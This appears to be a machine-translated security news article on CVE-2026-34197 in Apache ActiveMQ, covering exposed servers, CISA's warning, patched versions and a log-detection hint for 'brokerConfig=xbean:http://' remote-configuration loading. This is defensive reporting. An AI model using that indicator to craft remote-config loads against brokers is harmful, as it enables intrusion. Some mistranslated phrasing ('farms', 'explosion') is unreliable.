A serious vulnerability in Apache ActiveMQ is leaving thousands of servers unaccounted for and there is already evidence of attacks going on. Non-profit researchers Shadowserver have detected more than 6,400 IP addresses with Internet-accessible ActiveMQ prints that are still vulnerable to a high-gravity code injection failure.
ActiveMQ is one of the most widespread open source messaging brokers in Java environments for asynchronous interapplication communications. Its popularity makes any serious failure an attractive target for attackers who seek to run remote code or move laterally within compromised networks; therefore the emergence of this failure has caused immediate alarm between security teams and administrators.
Weakness, recorded as CVE-2026-34197, was identified by the researcher Naveen Sunkavally of Horizon3, who documented how it went unnoticed for more than a decade and that in his work he took advantage of IA assistants to speed up the investigation; the technical root is an insufficient validation of entries that allows authenticated actors to force the execution of arbitrary commands in unparked instances. The official notification of the ActiveMQ project was published on March 30 and contains the corrected versions: ActiveMQ Classic 6.2.3 and 5.19.4( Apache announcement).
The Shadowserver data also show a worrying geographical distribution: almost half of the detected instances are in Asia, with important concentrations also in North America and Europe. This public visibility facilitates the work of attackers who scan the network for vulnerable facilities and, according to the US agency itself, farms have already been observed in real environments.
In the face of evidence of active use of the failure, the Infrastructure and Cybersecurity Agency of the USA United States (CISA) issued a warning and set a deadline for federal agencies to secure their servers. CISA recalls that this type of defect is often fertile ground for malicious actors and recommends applying the supplier's mitigation, following the applicable guidelines for cloud services (BOD 22-01) or stopping using the product if there are no available protections.
Systems managers should not wait: the most effective thing is to apply the official patches to the corrected versions. If an immediate update is not feasible, there are temporary mitigation and perimeter controls that can reduce exposure, but are no substitute for correction. Horizon3 researchers themselves advise to inspect the broker records by looking for suspicious connections that use internal VM transport and chains with the parameter brokerConfig = xbean: http: / /, indications that may indicate attempts to operate or load malicious configurations ( disclosure of Horizon3).
This incident does not arise in vacuum: ActiveMQ has previously appeared in warnings of actual exploitation. CISA has included previous project vulnerabilities in its catalogue of exploited failures, such as CVE-2016-3088 and CVE-2023-46604, the latter related to ransomware campaigns that took advantage of a 0- day. This record confirms that operating patterns and tools to compromise brokers are well documented and available to attackers.
For technical equipment and product managers the list of tasks is clear: to identify all the instances of ActiveMQ exposed, to prioritize the update to the versions published by Apache, to review logs and telemetry in search of unauthorized access signals and to evaluate network controls that limit access to service from the Internet. If you manage cloud services, also check settings and apply security guides specific to that environment as recommended by CISA.
The combination of an old vulnerability, the ease of its exploitation and the number of servers detected make CVE-2026-34197 a threat that requires immediate attention. To read official sources and expand technical information, see the tab in the NVD ( CVE-2026-34197), the technical disclosure of Horizon3 ( researcher's analysis), the Apache ( Security notice) and the monitoring of Shadowserver exposures ( Shadowserver panel).
If you're an administrator, don't leave it for later: updates, reviews the logs and limits public access. If you are responsible for risks, press for the patch to be applied with priority. In safety, the difference between detection and timely remedy may be the difference between a minor incident and a major crisis.
18-year-old Ukrainian youth leads a network of infostealers that violated 28,000 accounts and left $250,000 in losses
The Ukrainian authorities, in coordination with US agents. They have focused on an operation of infostealer which, according to the Ukrainian Cyber Police, was allegedly adminis...
The digital signature is in check: Microsoft dismands a service that turned malware into apparently legitimate software
Microsoft announced the disarticulation of a "malware-signing-as-a-service" operation that exploited its device signature system to convert malicious code into seemingly legitim...
A single GitHub workflow token opened the door to the software supply chain
A single GitHub workflow token failed in the rotation and opened the door. This is the central conclusion of the incident in Grafana Labs following the recent wave of malicious ...
WebWorm 2025: the malware that is hidden in Discord and Microsoft Graphh to evade detection
The latest observations by cyber security researchers point to a change in worrying tactics of an actor linked to China known as WebWorm: in 2025 it has incorporated back doors ...
Identity is no longer enough: continuous verification of the device for real-time security
Identity remains the backbone of many security architectures, but today that column is cracking under new pressures: advanced phishing, real-time proxyan authentication kits and...
The dark matter of identity is changing the rules of corporate security
The Identity Gap: Snapshot 2026 report published by Orchid Security puts numbers to a dangerous trend: the "dark matter" of identity - accounts and credentials that are neither ...
PinTheft the public explosion that could give you root on Arch Linux
A new public explosion has brought to the surface again the fragility of the Linux privilege model: the V12 Security team named the failure as PinTheft and published a concept t...